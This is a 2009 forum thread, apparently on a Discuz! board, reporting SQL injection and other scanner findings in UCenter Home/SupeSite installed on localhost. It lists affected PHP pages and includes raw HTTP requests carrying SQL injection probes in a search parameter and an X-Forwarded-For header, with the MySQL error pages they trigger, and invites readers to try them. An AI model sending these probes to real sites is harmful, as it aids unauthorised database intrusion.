[BUG] MySQL injection in UCenter Home

yayamouse posted on 2009-12-15 15:21:58
This post was last edited by yayamouse on 2009-12-15 17:43

Blind SQL injection        64
SQL injection        3
Insufficient account lockout        1
Database error pattern found        6
Session identifier not updated        2
Session fixation        2
DOM-based cross-site scripting        1
Predictable login credentials        1
Cross-site scripting        8
Authentication bypass using SQL injection        1
Vulnerable URLs
URL         Issues (types)         Remediation tasks (types)
http://127.0.0.1/        3 (3)        3 (3)
http://127.0.0.1/com3/        1 (1)        1 (1)
http://127.0.0.1/com2/        1 (1)        1 (1)
http://127.0.0.1/com1/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/logs        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/.cobalt/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/www-sql/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/w3-msql/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/tools/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/templates/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/sws/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/suche/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/ssi/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/search/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/samples/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/rwcgi60/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/powerup/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/pollit/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/openwebmail/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/news/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/mwf/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/ikonboard/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/iisadmin/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/hwadmin5340/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/hamweather/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/gw5/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/guestbook/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/gbook/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/excite/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/ews/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/dcforum/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/dbman/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/dasp/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/cutecast/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/cssearch/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/csfaq/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/cgi-bin/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/cgi/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/carello/        1 (1)        1 (1)
http://127.0.0.1/cgi-bin/calendar/        1 (1)        1 (1)
http://127.0.0.1/aux/        1 (1)        1 (1)
http://127.0.0.1/qc122/        25 (3)        25 (3)
http://127.0.0.1/qc122/admincp.php        1 (1)        1 (1)
http://127.0.0.1/qc122/batch.common.php        3 (1)        3 (1)
http://127.0.0.1/qc122/batch.login.php        18 (10)        15 (7)
http://127.0.0.1/qc122/batch.panel.php        4 (3)        4 (3)
http://127.0.0.1/qc122/batch.postnews.php        1 (1)        1 (1)
http://127.0.0.1/qc122/batch.search.php        9 (5)        9 (3)
http://127.0.0.1/qc122/cp.php        21 (7)        19 (4)
http://127.0.0.1/qc122/do.php        10 (4)        10 (3)
http://127.0.0.1/qc122/index.php        2 (2)        2 (2)
http://127.0.0.1/qc122/space.php        4 (4)        4 (3)
http://127.0.0.1/qc122/home/        1 (1)        1 (1)
http://127.0.0.1/qc122/home/api/uc.php        10 (4)        5 (2)
http://127.0.0.1/qc122/ucenter/        1 (1)        1 (1)
http://127.0.0.1/qc122/ucenter/admin.php        3 (2)        3 (2)
http://127.0.0.1/qc122/bbs/        1 (1)        1 (1)
OP | yayamouse posted on 2009-12-15 15:23:34
Blind SQL injection (2/12)
Affected URLs
        http://127.0.0.1/qc122/
        http://127.0.0.1/qc122/batch.common.php
        http://127.0.0.1/qc122/batch.login.php
        http://127.0.0.1/qc122/batch.panel.php
        http://127.0.0.1/qc122/batch.postnews.php
        http://127.0.0.1/qc122/batch.search.php
        http://127.0.0.1/qc122/cp.php
        http://127.0.0.1/qc122/do.php
        http://127.0.0.1/qc122/home/api/uc.php
        http://127.0.0.1/qc122/space.php

OP | yayamouse posted on 2009-12-15 15:28:29
GET /qc122/home/api/uc.php?time=1260409586&code=5795GvVJczC4GNBAWZ6GDlXQbW7fjZuWwmTBjUtO3HTswNNPKZWg38guTotjRsVltm%252BPz6N2doCDB6euzA HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 127.0.0.1
X-Forwarded-For: %2527


HTTP/1.1 200 OK
Content-Length: 523
Date: Thu, 10 Dec 2009 05:36:28 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html

<div style="position:absolute;font-size:11px;font-family:verdana,arial;background:#EBEBEB;padding:0.5em;">
                                <b>MySQL Error</b><br>
                                <b>Message</b>: Can not connect to MySQL server<br>
                                <b>SQL</b>: <br>
                                <b>Error</b>: Can't connect to MySQL server on 'localhost' (10048)<br>
                                <b>Errno.</b>: 2003<br>
                                <a href="http://faq.comsenz.com/?type=mysql&dberrno=2003&dberror=Can%27t%20connect%20to%20MySQL%20server%20on%20%27localhost%27%20%2810048%29" target="_blank">Click here to seek help.</a>
                                </div>

OP | yayamouse posted on 2009-12-15 15:30:18
Sent:
GET /qc122/batch.search.php?searchkey=1234&type=&searchname=subject&page=WF'SQL"Probe;A--B HTTP/1.0
Cookie: _refer=deleted; supe__refer=%252Fqc122%252Fadmincp.php; supe_sauth=deleted; supe_auth=4488dicNG9PxYjGCQgYGIaVMcWeizPo32dbrZNTf4eV592XmY8qWLhLV7r5IzBPTQQoLFTpvUHY4osTGAJjr; prF_auth=01daRiYxm8qnnQ6higa%2BN2CmgXuXt0wjEZnlLfJBKLWTL4pp3rML5%2B3UrUV98ggnT0hw1DOK%2BWOvDS7lo6xINg; prF_cookietime=2592000; supe_supe_refresh_items=0_4889_4897_4868_4863_4882; supe_seccode=f88ePHmz3VM87NUzakrLaMkcKwvez2lV5JnrPQxpTSV2; supe_sid=deleted
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 127.0.0.1
Referer: http://127.0.0.1/qc122/batch.search.php

Returned:

HTTP/1.1 200 OK
Content-Length: 600
Date: Thu, 10 Dec 2009 04:23:55 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html; charset=gbk

</table></table></table></table></table>
<p style="font-family: Verdana, Tahoma; font-size: 11px; background: #FFFFFF;"><b>SupeSite info</b>: MySQL Query Error<br />
<br />
<b>User</b>: admin<br />
<b>Time</b>: 2009-12-10 12:23pm<br />
<b>Script</b>: /qc122/batch.search.php<br />
<br />
<b>SQL</b>: SELECT * FROM [Table]spaceitems WHERE subject LIKE '%1234%' ORDER BY dateline DESC LIMIT -30,30<br />
<b>Error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30,30' at line 1<br />
<b>Errno.</b>:  1064</p>

OP | yayamouse posted on 2009-12-15 15:30:36
Everyone can give it a try.
Discuz! official site ( 皖ICP备16010102号 )